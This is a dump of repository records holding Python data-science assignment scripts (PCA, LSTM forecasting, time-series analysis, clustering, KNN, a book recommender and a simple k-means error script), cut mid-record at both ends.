"fdd324053fa91171f38775a836ec2ba2d0ddcbf0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2198, "license_type": "no_license", "max_line_length": 115, "num_lines": 89, "path": "/PCA/PCA_assignment.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Sep 25 12:57:13 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\n#EDA\r\ndata=pd.read_csv('E:\\\\Tej\\\\Assignments\\\\Asgnmnt\\PCA\\\\wine.csv')\r\ndata.describe()\r\ndata.info()\r\ndata.columns\r\ndata.shape\r\ndata.Type.value_counts()\r\n\r\n\r\n#Data Preprocessing\r\nfrom sklearn.preprocessing import LabelEncoder\r\nnumber= LabelEncoder()\r\ndata['Type']=number.fit_transform(data['Type'])\r\n\r\ndef norm_func(i):\r\n x= (i-i.min())/(i.max()-i.min())\r\n return(x)\r\n\r\ndata.iloc[:,1:]=norm_func(data.iloc[:,1:])\r\n\r\n#PCA\r\nfrom sklearn.decomposition import PCA\r\npca=PCA()\r\npca_values=pca.fit_transform(data)\r\n\r\n#amount of variance explained by each component\r\nvar= pca.explained_variance_ratio_\r\nvar\r\npca.components_\r\n\r\nplt.plot(var) \r\n\r\n#cumulative sum if variances in %\r\nvar1=np.cumsum(np.round(var,decimals=3)*100) # we can use upto 7 PC's to get 95.1% information about data\r\nplt.plot(var1,'co-')\r\n\r\nx=pca_values[:,0]\r\ny=pca_values[:,1]\r\nz=pca_values[:,2]\r\nplt.scatter(x,y);plt.xlabel('PC1');plt.ylabel('PC2') #no correlation\r\n\r\ndf1=pd.DataFrame(pca_values[:,:3])\r\n\r\n#clustering on original dataset\r\ndata2=data.iloc[:,1:] #omitting first column \r\n\r\nfrom sklearn.cluster import KMeans\r\nwcss=[]\r\nfor i in range(1,11):\r\n kmeans=KMeans(n_clusters=i,init='k-means++',random_state=42)\r\n kmeans.fit(data2)\r\n wcss.append(kmeans.inertia_)\r\nplt.plot(range(1,11),wcss,'co-')\r\n# optimum number of cluster=3\r\n\r\n\r\n####Clustering on using first 3 principal component scores####\r\n\r\nfrom sklearn.cluster import KMeans\r\nwcss=[]\r\nfor i in range(1,11):\r\n kmeans=KMeans(n_clusters=i,init='k-means++',random_state=42)\r\n kmeans.fit(df1)\r\n wcss.append(kmeans.inertia_)\r\nplt.plot(range(1,11),wcss,'ro-');plt.title('Scree Plot')\r\n#optimum number of cluster = 3\r\n\r\n\r\nimport scipy.cluster.hierarchy as sch\r\nz= sch.linkage(df1,method='ward',metric='euclidean')\r\nsch.dendrogram(z);plt.title('dendrogram')\r\n\r\n\r\n\r\n####hence, we have obtained same number of clusters with the original data and the first three primcipal components\r\n#(class column we have ignored at the begining who shows it has 3 clusters)df\r\n" }, { "alpha_fraction": 0.649193525314331, "alphanum_fraction": 0.6783154010772705, "avg_line_length": 29.67375946044922, "blob_id": "cd1f908026a0954fc9794762c8c4f4e6cf642e1a", "content_id": "f8242401f530619399cc952f05211334c75c084b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4464, "license_type": "no_license", "max_line_length": 105, "num_lines": 141, "path": "/Forecasting/airlines LSTM.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Nov 26 08:58:35 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\nimport pandas as pd\r\n\r\ndf = pd.read_excel('E:\\\\Tej\\\\Assignments\\\\Asgnmnt\\\\Forecasting\\\\Airlines_Data.xlsx')\r\ndf.head()\r\ndf.columns\r\n\r\ndf1 = df.reset_index()['Passengers']\r\n\r\ndf1.shape\r\n\r\nimport matplotlib.pyplot as plt\r\nplt.plot(df1)\r\n\r\n\r\n#LSTM values are sensitive to scale of data so we apply minmaxscaler\r\nimport numpy as np\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nscaler = MinMaxScaler(feature_range=(0,1))\r\ndf1 = scaler.fit_transform(np.array(df1).reshape(-1,1))\r\n\r\ndf1.shape\r\n\r\n#train test split for time series data in ordered manner\r\ntrain_size = int(len(df1)*0.65) #output should be integer value not float\r\ntest_size = len(df1)-train_size\r\ntrain_data, test_data = df1[0:train_size,:], df1[0:test_size,:]\r\n\r\n#converting data into dependent and independant using timesteps\r\n#convert an array of values into dataset matrix\r\ndef create_dataset(dataset, time_step = 1):\r\n dataX, dataY = [],[]\r\n for i in range(len(dataset)-time_step-1):\r\n a=dataset[i:(i+time_step),0] ###i=0, 0,1,2,3-----99 100 \r\n dataX.append(a)\r\n dataY.append(dataset[i+time_step,0])\r\n return np.array(dataX), np.array(dataY)\r\n\r\ntime_step = 10\r\nx_train,y_train = create_dataset(train_data,time_step)\r\nx_test, y_test = create_dataset(test_data,time_step)\r\n\r\nprint(x_train.shape)\r\nprint(y_train.shape)\r\n\r\n#for LSTM model, x data needs to be in 3 dimensions[samples, timestep, festures]\r\nx_train = x_train.reshape(x_train.shape[0], x_train.shape[1], 1)\r\nx_test = x_test.reshape(x_test.shape[0],x_test.shape[1], 1)\r\n\r\n#importing tf libarries for stacked LSTM\r\nfrom tensorflow.keras.models import Sequential\r\nfrom tensorflow.keras.layers import Dense\r\nfrom tensorflow.keras.layers import LSTM\r\n\r\n#create an stacked LSTM model\r\nmodel = Sequential()\r\nmodel.add(LSTM(50,return_sequences=True, input_shape = (100,1))) #(timestep, feature)\r\nmodel.add(LSTM(50,return_sequences=True))\r\nmodel.add(LSTM(50))\r\nmodel.add(Dense(1))\r\nmodel.compile(loss = 'mean_squared_error', optimizer = 'adam')\r\n\r\nmodel.summary()\r\n\r\nmodel.fit(x_train, y_train, validation_data = (x_test, y_test), epochs = 200, batch_size=64, verbose = 1)\r\n\r\n#predicting the results\r\ntrain_predict = model.predict(x_train)\r\ntest_predict = model.predict(x_test)\r\n\r\n#rescaling the data to original form to get the desired results\r\ntrain_predict = scaler.inverse_transform(train_predict)\r\ntest_predict = scaler.inverse_transform((test_predict))\r\n\r\nimport math\r\nfrom sklearn.metrics import mean_squared_error, accuracy_score\r\nmath.sqrt(mean_squared_error(y_train, train_predict)) #182.700\r\nprint(accuracy_score(y_train, train_predict))\r\nmath.sqrt(mean_squared_error(y_test, test_predict)) #151.947\r\n\r\n### Plotting \r\n# shift train predictions for plotting\r\nimport numpy\r\nlook_back=10\r\ntrainPredictPlot = numpy.empty_like(df1)\r\ntrainPredictPlot[:, :] = np.nan\r\ntrainPredictPlot[look_back:len(train_predict)+look_back, :] = train_predict\r\n# shift test predictions for plotting\r\ntestPredictPlot = numpy.empty_like(df1)\r\ntestPredictPlot[:, :] = numpy.nan\r\ntestPredictPlot[len(train_predict)+(look_back*2)+1:len(df1)-1, :] = test_predict\r\n# plot baseline and predictions\r\nplt.plot(scaler.inverse_transform(df1))\r\nplt.plot(trainPredictPlot)\r\nplt.plot(testPredictPlot)\r\nplt.show()\r\n\r\n#since, time_step =100, to predict the prices for next 30 days, we have to take values from last 100 days\r\nx_input=test_data[86:].reshape(1,-1)\r\nx_input.shape\r\n\r\ntemp_input=list(x_input)\r\ntemp_input=temp_input[0].tolist()\r\n\r\nfrom numpy import array\r\n\r\nlst_output=[]\r\nn_steps=100\r\ni=0\r\nwhile(i<30):\r\n \r\n if(len(temp_input)>100):\r\n #print(temp_input)\r\n x_input=np.array(temp_input[1:])\r\n print(\"{} day input {}\".format(i,x_input))\r\n x_input=x_input.reshape(1,-1)\r\n x_input = x_input.reshape((1, n_steps, 1))\r\n #print(x_input)\r\n yhat = model.predict(x_input, verbose=0)\r\n print(\"{} day output {}\".format(i,yhat))\r\n temp_input.extend(yhat[0].tolist())\r\n temp_input=temp_input[1:]\r\n #print(temp_input)\r\n lst_output.extend(yhat.tolist())\r\n i=i+1\r\n else:\r\n x_input = x_input.reshape((1, n_steps,1))\r\n yhat = model.predict(x_input, verbose=0)\r\n print(yhat[0])\r\n temp_input.extend(yhat[0].tolist())\r\n print(len(temp_input))\r\n lst_output.extend(yhat.tolist())\r\n i=i+1\r\n \r\n\r\nprint(lst_output)" }, { "alpha_fraction": 0.6617318391799927, "alphanum_fraction": 0.6832402348518372, "avg_line_length": 29.36842155456543, "blob_id": "715ab2a36793e3021031b5e0d08f7bc1f9133825", "content_id": "4fbbdb9a4c2518fce950b966532f5c9f4dc379b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3580, "license_type": "no_license", "max_line_length": 111, "num_lines": 114, "path": "/Forecasting/cocacola.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Nov 1 11:17:08 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndf = pd.read_excel('E:\\\\Tej\\\\Assignments\\\\Asgnmnt\\\\Forecasting\\\\CocaCola_Sales_Rawdata.xlsx')\r\ndf.head()\r\ndf.tail()\r\n\r\nimport seaborn as sns\r\nsns.boxplot(df['Sales'])\r\n\r\ndf.set_index(['Quarter'], inplace = True)\r\ndf.dtypes\r\ndf.head()\r\ndf.describe()\r\n\r\ndf.plot();plt.xlabel('Quarter');plt.ylabel('sales')\r\n#upward trend with addiive seasonality and non-stationary\r\n\r\n#rolling statistics\r\nrol_mean = df.rolling(window = 4).mean()\r\nrol_sd = df.rolling(window = 4).std()\r\n\r\n#plotting the data\r\nplt.plot(df, label = 'original data')\r\nplt.plot(rol_mean, color='red', label= 'rolling mean')\r\nplt.plot(rol_sd, color = 'black',label = 'rolling std')\r\nplt.legend(loc = 'best')\r\nplt.show()\r\n\r\n#augmented dickey-fuller test for stationarity\r\n#H0- not sationary\r\n#Ha - stationary\r\nfrom statsmodels.tsa.stattools import adfuller\r\ntest = adfuller(df['Sales'])\r\ndfoutput = pd.Series(test[0:4], index = ['Test statistic', 'P-value','Lags used', 'No. of observations'])\r\nfor key,value in test[4].items():\r\n dfoutput['critical value (%s)'%key] = value\r\nif dfoutput[1] <=0.05:\r\n print('strong evidence against null hypothsis(H0), reject null hypothesis, Data is not stationary')\r\nelse:\r\n print('weak evidence against null hypothsis(H0),Data is not stationary')\r\nprint(dfoutput)\r\n# pvalue is too high<0.05, fail to reject H0, data is not stationary\r\n\r\n#defining adfuller test function\r\ndef ts_adfuller(ts):\r\n from statsmodels.tsa.stattools import adfuller\r\n test1 = adfuller(ts['Sales'])\r\n dfoutput1 = pd.Series(test1[0:4], index = ['Test statistic', 'P-value','Lags used', 'No. of observations'])\r\n for key,value in test1[4].items():\r\n dfoutput1['critical value (%s)'%key] = value\r\n if dfoutput1[1] <=0.05:\r\n print('strong evidence against null hypothsis(H0), reject null hypothesis, Data is not stationary')\r\n else:\r\n print('weak evidence against null hypothsis(H0),Data is not stationary')\r\n print(dfoutput1)\r\n \r\ndfshifted = df - df.shift(4)\r\ndfshifted\r\ndfshifted.dropna(inplace = True)\r\nts_adfuller(dfshifted)\r\n#data is almost stationary\r\n\r\nplt.plot(dfshifted)\r\nfrom statsmodels.tsa.seasonal import seasonal_decompose\r\nresult = seasonal_decompose(df, model = 'additive', period = 12)\r\ntrend = result.trend\r\nseasonal = result.seasonal\r\nresidual = result.resid\r\n\r\nplt.subplot(411)\r\nplt.plot(df, label = 'original')\r\nplt.legend(loc = 'best')\r\nplt.subplot(412)\r\nplt.plot(trend, label = 'trend')\r\nplt.legend(loc = 'best')\r\nplt.subplot(413)\r\nplt.plot(seasonal, label = 'seasonality')\r\nplt.legend(loc = 'best')\r\nplt.subplot(414)\r\nplt.plot(residual, label = 'residuals')\r\nplt.legend(loc = 'best')\r\nplt.tight_layout()\r\nplt.show()\r\n\r\n#from graph, residuals are not stationary\r\n\r\n\r\n#determining p and q functions\r\nfrom statsmodels.tsa.stattools import acf,pacf\r\nacf_df = acf(df,nlags = 20, fft = False)\r\nacf_pacf = pacf(df,nlags = 20,method = 'ols')\r\n\r\nplt.plot(acf_df)\r\nplt.axhline(y= 0, linestyle = '--')\r\nplt.axhline(y = -1.96/np.sqrt(len(dfshifted)),linestyle = '--')\r\nplt.axhline(y = 1.96/np.sqrt(len(dfshifted)),linestyle = '--')\r\nplt.title('Autocorrelation plot with confidence intervals')\r\nplt.show()\r\n\r\nplt.plot(acf_pacf)\r\nplt.axhline(y= 0, linestyle = '--')\r\nplt.axhline(y = -1.96/np.sqrt(len(dfshifted)),linestyle = '--')\r\nplt.axhline(y = 1.96/np.sqrt(len(dfshifted)),linestyle = '--')\r\nplt.title('Parial Autocorrelation plot with confidence intervals')\r\nplt.show()\r\n\r\n\r\n" }, { "alpha_fraction": 0.6487414240837097, "alphanum_fraction": 0.678947389125824, "avg_line_length": 40.019229888916016, "blob_id": "425dc21bd5c3b67ca0979c63a18b0d818890a259", "content_id": "4050a152744e63020c424b334d7d6025393562b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4370, "license_type": "no_license", "max_line_length": 169, "num_lines": 104, "path": "/Clustering/Airlines data.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Sep 01 13:09:26 2021\r\n\r\n@author: Admin\r\n\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\nairlines=pd.read_excel('E:\\Tej\\Assignments\\Asgnmnt\\Clustering\\EastWestAirlines.xlsx',sheet_name='data')\r\nairlines\r\nairlines.info()\r\n\r\ndef norm_func(i):\r\n x= (i-i.min())/(i.max()-i.min())\r\n return(x)\r\n\r\ny=norm_func(airlines.iloc[:,[1,6,7,8,9]])\r\n\r\nz=airlines.iloc[:,[2,3,4,5,10,11]]\r\n\r\ndata=pd.concat([y,z],axis=1)\r\n\r\ndata.replace(np.nan,0,inplace= True)\r\ndata.info()\r\ndata.describe()\r\n\r\n####K-means Clustering####\r\nfrom sklearn.cluster import KMeans\r\nwcss=[]\r\nfor i in range(1,11):\r\n kmeans=KMeans(n_clusters= i,init='k-means++',random_state=42)\r\n kmeans.fit(data)\r\n wcss.append(kmeans.inertia_)\r\nplt.plot(range(1,11),wcss,'ro-');\r\nplt.xlabel('No. of Clusters');\r\nplt.ylabel('wcss');\r\nplt.title('Scree plot')\r\n#from 4 the curve started flattening, therefore we choose 4 as optimum no. of clusters\r\n\r\nkmeans_f=KMeans(n_clusters=4,init='k-means++',random_state=42)\r\ny_kmeans=kmeans_f.fit_predict(data) \r\ny_kmeans\r\ndata['cluster']=kmeans_f.labels_\r\nairlines['cluster']=kmeans_f.labels_\r\nairlines.cluster.value_counts()\r\n#cluster 0 is of small group of premium customers-53\r\n#cluster 2 & 3 consists of middle spending customers\r\n#cluster 1 is having least spending customers\r\n\r\ncluster1= data.loc[y_kmeans == 0]\r\ncluster2= data.loc[y_kmeans == 1]\r\ncluster3= data.loc[y_kmeans == 2]\r\ncluster4= data.loc[y_kmeans == 3]\r\n \r\nsns.barplot(x='cluster',y='Balance',data=airlines) #order=1,3,2,0 lowest to highest\r\nsns.barplot(x='cluster',y='Qual_miles',data=airlines) #order=1,3,2,0 \r\nsns.barplot(x='cluster',y='cc1_miles',data=airlines) #order=1,0,3,2\r\nsns.barplot(x='cluster',y='cc2_miles',data=airlines) \r\nsns.barplot(x='cluster',y='cc3_miles',data=airlines) \r\nsns.barplot(x='cluster',y='Bonus_miles',data=airlines) #order=1,3,0,2\r\nsns.barplot(x='cluster',y='Bonus_trans',data=airlines) #order=1,3,2,0\r\nsns.barplot(x='cluster',y='Flight_miles_12mo',data=airlines) #order=1,3,2,0\r\nsns.barplot(x='cluster',y='Flight_trans_12',data=airlines) #order=1,3,2,0\r\nsns.barplot(x='cluster',y='Days_since_enroll',data=airlines) #order=1,0,3,2\r\nsns.barplot(x='cluster',y='Award?',data=airlines) #order=1,3,2,0\r\n#cluster 0 are high spending cluster as it has highest number of miles eligible for free travel and rewards also alongwith other parameters\r\n#cluster 2 & 3 are middle spending clusters with average balance and rewards and offers.\r\n#cluster 1 is of least spending customers with least flight miles and miles eligible for free travel\r\n#customers in cluster 2&3 are enrolled for long days than others and cluster 0 are in the middle of a & 2-3.\r\n#customers in cluster 0 have received most awards due to their high spendings and that of cluster 1 have received the least.\r\n#for customers with least flight transactions(cluster 1), discounted fair rates should be given to increase their spending and the to make them to stick to the airlines.\r\n\r\nplt.scatter(cluster1['Balance'],cluster1['Bonus_miles'],c='red',label='cluster1')\r\nplt.scatter(cluster2['Balance'],cluster2['Bonus_miles'],c='blue',label='cluster2')\r\nplt.scatter(cluster3['Balance'],cluster3['Bonus_miles'],c='magenta',label='cluster3')\r\nplt.scatter(cluster4['Balance'],cluster4['Bonus_miles'],c='black',label='cluster4')\r\nplt.scatter(kmeans_f.cluster_centers_[:,0],kmeans_f.cluster_centers_[:,1],c='cyan',label='centroids')\r\nplt.show()\r\n\r\ndata.iloc[:,:].groupby('cluster').mean()\r\n\r\nsns.pairplot(data,hue='cluster')\r\n \r\n \r\n####Hierarchcal clustering ####\r\nimport scipy.cluster.hierarchy as sch\r\nz=sch.linkage(data, method = 'ward',metric='euclidean')\r\nplt.figure(figsize=(15,10));plt.title('Hierarchical Clustering Dendrogram')\r\nsch.dendrogram(z,\r\n leaf_rotation=0.,);plt.show()\r\n\r\n#alternative method\r\nfrom sklearn.cluster import AgglomerativeClustering\r\nh_cluster= AgglomerativeClustering(n_clusters=4,affinity='euclidean',linkage='ward').fit(data) \r\n\r\ndata['cluster']=h_cluster.labels_\r\ndata.iloc[:,0:].groupby('cluster').mean()\r\n\r\ndata.to_csv('EastWestAirlines.csv',encoding='utf-8')\r\n" }, { "alpha_fraction": 0.5979381203651428, "alphanum_fraction": 0.6201427578926086, "avg_line_length": 25.736263275146484, "blob_id": "ff53d4436fccdeeb962234e0662f5be3f66bdf96", "content_id": "b3d106ae61c0746678c490e1f1437b3cc4c2cca0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2522, "license_type": "no_license", "max_line_length": 90, "num_lines": 91, "path": "/KNN/glass.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Oct 2 18:04:36 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport seaborn as sns\r\n\r\ndata = pd.read_csv('E:\\\\Tej\\\\Assignments\\\\Asgnmnt\\\\KNN\\\\glass.csv')\r\ndata\r\n\r\ndata.describe()\r\ndata.info()\r\ndata.nunique()\r\ndata.columns\r\n\r\n#Preprocessing \r\n#standardization\r\ndef norm_func(i):\r\n x= (i - i.min())/(i.max()-i.min())\r\n return(x)\r\n\r\ndata.iloc[:,[0,1,2,3,4,6,]] = norm_func(data.iloc[:,[0,1,2,3,4,6,]])\r\n\r\n#EDA \r\ncor = data.corr()\r\nsns.heatmap(cor)\r\n# =============================================================================\r\n# help(np.corrcoef)\r\n# Ca and Ri are highly correlated, therefore we will Ca or Ri(in this case Ca)\r\n# Ca and K have very low correlation, \r\n# K is having very less correlation with type, herefore we will drop K also\r\n# =============================================================================\r\ng= sns.pairplot(data,hue = 'Type',diag_kind = 'hist')\r\n\r\ndata = data.drop(data.iloc[:,[5,6]],axis =1)\r\n#data are highly uncorrelated\r\n\r\nsns.boxplot(x= 'Type',y= 'RI',data =data)\r\nsns.boxplot(x= 'Type',y= 'Na',data =data)\r\nsns.boxplot(x= 'Type',y= 'Mg',data =data)\r\nsns.boxplot(x= 'Type',y= 'Al',data =data)\r\nsns.boxplot(x= 'Type',y= 'Si',data =data)\r\nsns.boxplot(x= 'Type',y= 'K',data =data)\r\nsns.boxplot(x= 'Type',y= 'Ca',data =data)\r\n\r\n# Target and independent variables\r\nX = data.iloc[:,0:7]\r\nY = data.iloc[:,-1]\r\n\r\n#splitting data into train\r\nfrom sklearn.model_selection import train_test_split\r\nx_train,x_test,y_train,y_test = train_test_split(X, Y, test_size = 0.25,random_state = 42)\r\n\r\n####conventional method####\r\n#KNN classification\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nmodel = KNeighborsClassifier(n_neighbors = 5)\r\nmodel.fit(x_train,y_train)\r\nmodel.predict(x_test)\r\n\r\n#training accuracy\r\nmodel.score(x_train,y_train) #0.775\r\n#test accuracy\r\nmodel.score(x_test,y_test) #0.703\r\n\r\n#storing the results for original dataset\r\ndata['y_pred'] = model.predict(X)\r\n\r\n#overall mean accuracy\r\nnp.mean(data.Type == data.y_pred) #0.757\r\n\r\n\r\n####Using for Loop####\r\nfrom sklearn import metrics\r\nk_range = range(1,10)\r\nscores={}\r\nscores_list = []\r\nfor k in k_range:\r\n model = KNeighborsClassifier(n_neighbors = k)\r\n model.fit(x_train,y_train)\r\n y_pred = model.predict(x_test)\r\n scores[k]= metrics.accuracy_score(y_test,y_pred)\r\n scores_list.append(metrics.accuracy_score(y_test,y_pred))\r\n \r\nprint(scores_list)\r\n#highest accuracy is obtained with 3 number of clusters that is 75.92%" }, { "alpha_fraction": 0.6950953602790833, "alphanum_fraction": 0.7196184992790222, "avg_line_length": 29.384614944458008, "blob_id": "5a7fc9aab3a09d0b3cf893808795a63d3574bed7", "content_id": "444e86ef1d2f231fafcc6ba565cc63402f0cfb01", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3670, "license_type": "no_license", "max_line_length": 128, "num_lines": 117, "path": "/Recommendation System/Recommandation Assignment.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Mar 18 19:48:52 2021\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\nbook_df= pd.read_csv(\"E:\\\\Tej\\\\Assignments\\\\Asgnmnt\\\\Recommandation\\\\book.csv\",encoding=('ISO-8859-1'))\r\nbook_df[0:5]\r\nbook_df=book_df.drop('Unnamed: 0',axis=True)\r\nbook_df=book_df.rename({'User.ID':'UserID','Book.Title':'BookTitle','Book.Rating':'BookRating'},axis=1)\r\nbook_df\r\nlen(book_df.UserID.unique())\r\nlen(book_df.BookTitle.unique())\r\nimport seaborn as sns\r\nsns.pairplot(book_df)\r\nuser_book_df=book_df.pivot_table(index='UserID', columns='BookTitle', values='BookRating',aggfunc='mean').reset_index(drop=True)\r\nuser_book_df\r\nuser_book_df = book_df.groupby(['UserID', 'BookTitle'])['BookRating'].mean().unstack()\r\nuser_book_df\r\nuser_book_df.index = book_df.UserID.unique()\r\nuser_book_df\r\nuser_book_df.fillna(0, inplace=True)\r\nuser_book_df\r\nfrom sklearn.metrics import pairwise_distances\r\nfrom scipy.spatial.distance import cosine, correlation\r\nuser_sim= 1 - pairwise_distances( user_book_df.values,metric='cosine')\r\nuser_sim= 1 - pairwise_distances( user_book_df.values,metric='correlation')\r\nuser_sim\r\n\r\n#Store the results in a dataframe\r\nuser_sim_df = pd.DataFrame(user_sim)\r\n\r\n#Set the index and column names to user ids \r\nuser_sim_df.index = book_df.UserID.unique()\r\nuser_sim_df.columns = book_df.UserID.unique()\r\n\r\nuser_sim_df.iloc[0:50, 0:50]\r\n\r\nnp.fill_diagonal(user_sim, 0)\r\nuser_sim_df.iloc[0:50, 0:50]\r\n\r\nuser_sim_df.idxmax(axis=1)[0:50]\r\n\r\nbook_df[(book_df['UserID']==276813 ) | (book_df['UserID']==3546)]\r\n\r\nuser_1=book_df[book_df['UserID']==276872]\r\nuser_2=book_df[book_df['UserID']==161677]\r\n\r\nuser_1.BookTitle\r\nuser_2.BookTitle\r\n\r\npd.merge(user_1,user_2,on='BookTitle',how='outer')\r\n\r\n#Alternative Method:\r\n#(Recommending Similar Movies)\r\n\r\nbook_df.groupby('BookTitle')['BookRating'].mean().sort_values(ascending=False).head()\r\n\r\nratings = pd.DataFrame(book_df.groupby('BookTitle')['BookRating'].mean())\r\n\r\nratings.head()\r\n\r\nratings['num of ratings'] = pd.DataFrame(book_df.groupby('BookTitle')['BookRating'].count())\r\nratings.head()\r\n\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n%matplotlib inline\r\n\r\nplt.figure(figsize=(10,4))\r\nratings['num of ratings'].hist(bins=70)\r\n\r\nplt.figure(figsize=(10,4))\r\nratings['BookRating'].hist(bins=70)\r\n\r\nsns.jointplot(x='BookRating',y='num of ratings',data=ratings,alpha=0.5)\r\n\r\nmoviemat =book_df.pivot_table(index='UserID',columns='BookTitle',values='BookRating')\r\nmoviemat.head\r\n\r\nratings.sort_values('num of ratings',ascending=False).head(10)\r\n\r\nratings.head(12)\r\n\r\nstardust_user_ratings = moviemat['Stardust']\r\ntheamber_user_ratings = moviemat['The Amber Spyglass (His Dark Materials, Book 3)']\r\nstardust_user_ratings.head()\r\n\r\nsimilar_to_stardust = moviemat.corrwith(stardust_user_ratings)\r\nsimilar_to_theamber= moviemat.corrwith(theamber_user_ratings)\r\n\r\ncorr_stardust = pd.DataFrame(similar_to_stardust,columns=['Correlation'])\r\ncorr_stardust.dropna(inplace=True)\r\ncorr_stardust\r\n\r\ncorr_stardust.sort_values('Correlation',ascending=False).head()\r\n\r\ncorr_stardust = corr_stardust.join(ratings['num of ratings'])\r\ncorr_stardust\r\n\r\ncorr_stardust[corr_stardust['num of ratings']>3].sort_values('Correlation',ascending=False).head()\r\n\r\ncorr_theamber = pd.DataFrame(similar_to_theamber,columns=['Correlation'])\r\n\r\ncorr_theamber.dropna(inplace=True)\r\n\r\ncorr_theamber = corr_theamber.join(ratings['num of ratings'])\r\n\r\ncorr_theamber[corr_theamber['num of ratings']>3].sort_values('Correlation',ascending=False).head()\r\n\r\n##conclusion:\r\n## we can conclude that, both The Amber Spyglass (His Dark Materials, Book 3) and Stardust have same ratings.\r\n## corr_theamber" } ]
34
NurbekSakiev/Data_Mining
https://github.com/NurbekSakiev/Data_Mining
4d20602e0c2a66a77c127a1eedf248e42d97c93a
f21c5d37c139406e37097d3644b875fbe9481159
e0259257da3bd95804054a9ee384d9b35a3b9bd5
refs/heads/master
2021-01-01T19:11:33.961087
2015-04-27T18:26:30
2015-04-27T18:26:30
31,588,874
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6036199331283569, "alphanum_fraction": 0.6371040940284729, "avg_line_length": 24.697673797607422, "blob_id": "835cf2b339ca639dd9c25bb471ef2c2dc22f4cde", "content_id": "e23865fb945b663f06ea1984df22ae91844af17c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1105, "license_type": "no_license", "max_line_length": 88, "num_lines": 43, "path": "/Assgn2.py", "repo_name": "NurbekSakiev/Data_Mining", "src_encoding": "UTF-8", "text": "total = 0\nfor i in range(1,74):\n\tfh = open ('/Users/Nur/Documents/Spring_2015/Data_Mining/Assignment02/Track1/gene.txt')\n\tdata = []\n\tfor line in fh.readlines():\n\t\ty = [value for value in line.split()]\n\t\tdata.append(y[i])\n\tfirst = []\n\tsecond = []\n\ttotal_1 = 0\n\ttotal_2 = 0\n\n\tdata = map(float,data)\n\tfirst = data[:len(data)/2]\n\tsecond = data[len(data)/2:]\n\trepeat = True\n\tcount = 0\n\terror=0\n\twhile (repeat):\n\t\tcount = count+1\n\t\ttotal_1 = sum(first)\n\t\ttotal_2 = sum(second)\n\t\tcentroid_1 = total_1/len(first)\n\t\tcentroid_2 = total_2/len(second)\n\t\tfirst_len = len(first)\n\t\tsecond_len = len(second)\n\t\tfor l in range(len(data)):\n\t\t\tif(abs(data[l]-centroid_1)>abs(data[l]-centroid_2)):\n\t\t\t\tsecond.append(data[l])\n\t\t\telse:\n\t\t\t\tfirst.append(data[l])\n\t\tfirst = first[first_len:]\n\t\tsecond = second[second_len:]\n\t\tif(total_1 == sum(first) and total_2 == sum(second)):\n\t\t\tbreak\n\tfor k in range(len(first)):\n\t\terror = error + (abs(centroid_1-first[k]))\n\tfor j in range(len(second)):\n\t\terror = error + (abs(centroid_2-second[j]))\n\ttotal = total + error\n\tdata = data[492:]\n\tfh.close()\nprint \"The total error is \", total/74\n" }, { "alpha_fraction": 0.6966261863708496, "alphanum_fraction": 0.7149797677993774, "avg_line_length": 33.296295166015625, "blob_id": "47598ee12f46052198cf4c48ff732bbd8fe739c8", "content_id": "1ede2ab534bdb2cff9d0c3d52966294d92df28e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3705, "license_type": "no_license", "max_line_length": 126, "num_lines": 108, "path": "/Test.py", "repo_name": "NurbekSakiev/Data_Mining", "src_encoding": "UTF-8", "text": "from collections import Counter\nimport math\n\n\n# Connects all texts and returns the final string\ndef get_combined_text(directory,folder_name,file_name,start_file,end_file):\n\ttest_result = ''\n\tfor i in range(start_file,end_file+1,1):\n\t\ttest = open(directory+folder_name+'/'+file_name+str(i)+'.txt').read()\n\t\ttest_result = test_result + test\n\treturn test_result\n\n# Returns the product of top 100 words probabilities\ndef top_common_words_prob(words_dict, total_num_words):\n\tprob_dict = {}\n\tprob_total = 1.0\n\tfor k,v in words_dict.most_common(100):\n\t\tprob_dict[k] = (words_dict[k]/float(total_num_words))\n\t\tprob_total = prob_total * prob_dict[k]\n\treturn prob_total\n\n\n# Normalizing the length of spam and non-spam 